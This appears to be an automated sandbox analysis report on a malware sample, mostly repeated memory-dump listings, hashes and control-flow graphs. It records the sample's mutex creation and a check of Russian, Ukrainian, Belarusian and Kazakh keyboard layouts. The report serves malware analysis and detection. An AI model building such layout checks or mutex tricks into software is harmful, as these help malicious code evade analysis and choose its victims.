                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                                                          • API String ID: 0-3963862150
                                                                                                                                                                                                                                                                                          • Opcode ID: 70031ff902cfd663d065ae8254f06c33d7d83ae99735935f1c738431ea9378fe
                                                                                                                                                                                                                                                                                          • Instruction ID: 1021050b10f3ca5cbb8d8d18219bf6b8a39a407d737c7ac4cd28e3a9744e5229
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70031ff902cfd663d065ae8254f06c33d7d83ae99735935f1c738431ea9378fe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9F1E3709102589FEB28DF54CC84BDEBBB9EF45304F5042A9F908A72C1DB749A98CF95

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 338 249ba5-249d91 call 257a00 call 245c10 call 248b30 call 258220
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: fafc0a3d95dd92b5f345c75b3a6956c14235090a094be85d9600360bb75715b6
                                                                                                                                                                                                                                                                                          • Instruction ID: ede7f8d5b51855c535fa75cf56ac2b3a958519c89acf2d46397256da55a65ab4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fafc0a3d95dd92b5f345c75b3a6956c14235090a094be85d9600360bb75715b6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8431A6316642008BFB1CDB78ECC976EB7A6EB86310F208218E404972D2C77589A48751

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 360 249f44-249f64 364 249f66-249f72 360->364 365 249f92-249fae 360->365 368 249f74-249f82 364->368 369 249f88-249f8f call 25d663 364->369 366 249fb0-249fbc 365->366 367 249fdc-249ffb 365->367 371 249fd2-249fd9 call 25d663 366->371 372 249fbe-249fcc 366->372 373 249ffd-24a009 367->373 374 24a029-24a916 call 2580c0 367->374 368->369 375 24a92b 368->375 369->365 371->367 372->371 372->375 380 24a01f-24a026 call 25d663 373->380 381 24a00b-24a019 373->381 377 24a953-24a994 Sleep CreateMutexA 375->377 378 24a92b call 276c6a 375->378 390 24a996-24a998 377->390 391 24a9a7-24a9a8 377->391 378->377 380->374 381->375 381->380 390->391 392 24a99a-24a9a5 390->392 392->391
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: 67adf38350e2b0fa57283f700a80f5fea463f182d56d1d2eaad4fbdabf093a02
                                                                                                                                                                                                                                                                                          • Instruction ID: 329563ca3fd780bcf3494ecaaf36b89fce80de92761d7ff003d25726347a01a1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67adf38350e2b0fa57283f700a80f5fea463f182d56d1d2eaad4fbdabf093a02
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C831AB327641048FFB1CDBB8EC887ADB766EBC2310F208618E414DB6C1C77599A48712

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 394 24a079-24a099 398 24a0c7-24a0e3 394->398 399 24a09b-24a0a7 394->399 400 24a0e5-24a0f1 398->400 401 24a111-24a130 398->401 402 24a0bd-24a0c4 call 25d663 399->402 403 24a0a9-24a0b7 399->403 405 24a107-24a10e call 25d663 400->405 406 24a0f3-24a101 400->406 407 24a132-24a13e 401->407 408 24a15e-24a916 call 2580c0 401->408 402->398 403->402 409 24a930-24a994 call 276c6a Sleep CreateMutexA 403->409 405->401 406->405 406->409 413 24a154-24a15b call 25d663 407->413 414 24a140-24a14e 407->414 424 24a996-24a998 409->424 425 24a9a7-24a9a8 409->425 413->408 414->409 414->413 424->425 426 24a99a-24a9a5 424->426 426->425
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0024A963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002A3254), ref: 0024A981
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID: T2*
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-2722087641
                                                                                                                                                                                                                                                                                          • Opcode ID: 48d582c0b494e27c7726a8303c2a085542d60e2c1cf9ee1578ad69c51568cbe5
                                                                                                                                                                                                                                                                                          • Instruction ID: ee301111c088559efac547b57cfad38d45f8732424eb602d493736bfada716b0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48d582c0b494e27c7726a8303c2a085542d60e2c1cf9ee1578ad69c51568cbe5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF3188317B41049BFB1CDBB8EDC9B6DB766DB86310F248218E418D73D1C77699A48B12

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
